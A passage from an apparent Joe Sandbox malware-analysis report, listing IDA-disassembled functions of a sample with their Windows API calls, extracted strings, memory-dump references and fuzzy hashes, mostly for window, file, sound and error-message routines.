                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                      • String ID:
                                      • API String ID: 461458858-0
                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                      Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                      • DeleteObject.GDI32(?), ref: 004301D0
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3969911579-0
                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                      Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                      • String ID: 0
                                      • API String ID: 956284711-4108050209
                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                      Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 369157077-1007645807
                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                      Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                      Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                      • _wcscpy.LIBCMT ref: 004787E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 3052893215-2127371420
                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                      Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                      • __swprintf.LIBCMT ref: 0045E7F7
                                      • _wprintf.LIBCMT ref: 0045E8B3
                                      • _wprintf.LIBCMT ref: 0045E8D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-2354261254
                                      • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                      • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                      Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 3038501623-2263619337
                                      • Opcode ID: fbecec011642e75c0826342797bee3cec1de7bcd6151ffebb94b53bcc76576dd
                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                      • Opcode Fuzzy Hash: fbecec011642e75c0826342797bee3cec1de7bcd6151ffebb94b53bcc76576dd
                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                      Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                      • __swprintf.LIBCMT ref: 0045E5F6
                                      • _wprintf.LIBCMT ref: 0045E6A3
                                      • _wprintf.LIBCMT ref: 0045E6C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-8599901
                                      • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                      • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                      Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                      • LoadStringW.USER32(00000000), ref: 00454040
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • _wprintf.LIBCMT ref: 00454074
                                      • __swprintf.LIBCMT ref: 004540A3
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 455036304-4153970271
                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                      Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                      Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                      • DeleteObject.GDI32(?), ref: 0047151E
                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                      • DeleteObject.GDI32(?), ref: 004715EA
                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                      • String ID:
                                      • API String ID: 3218148540-0
                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                      Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                      • String ID:
                                      • API String ID: 136442275-0
                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                      Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsncpy.LIBCMT ref: 00467490
                                      • _wcsncpy.LIBCMT ref: 004674BC
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcstok.LIBCMT ref: 004674FF
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcstok.LIBCMT ref: 004675B2
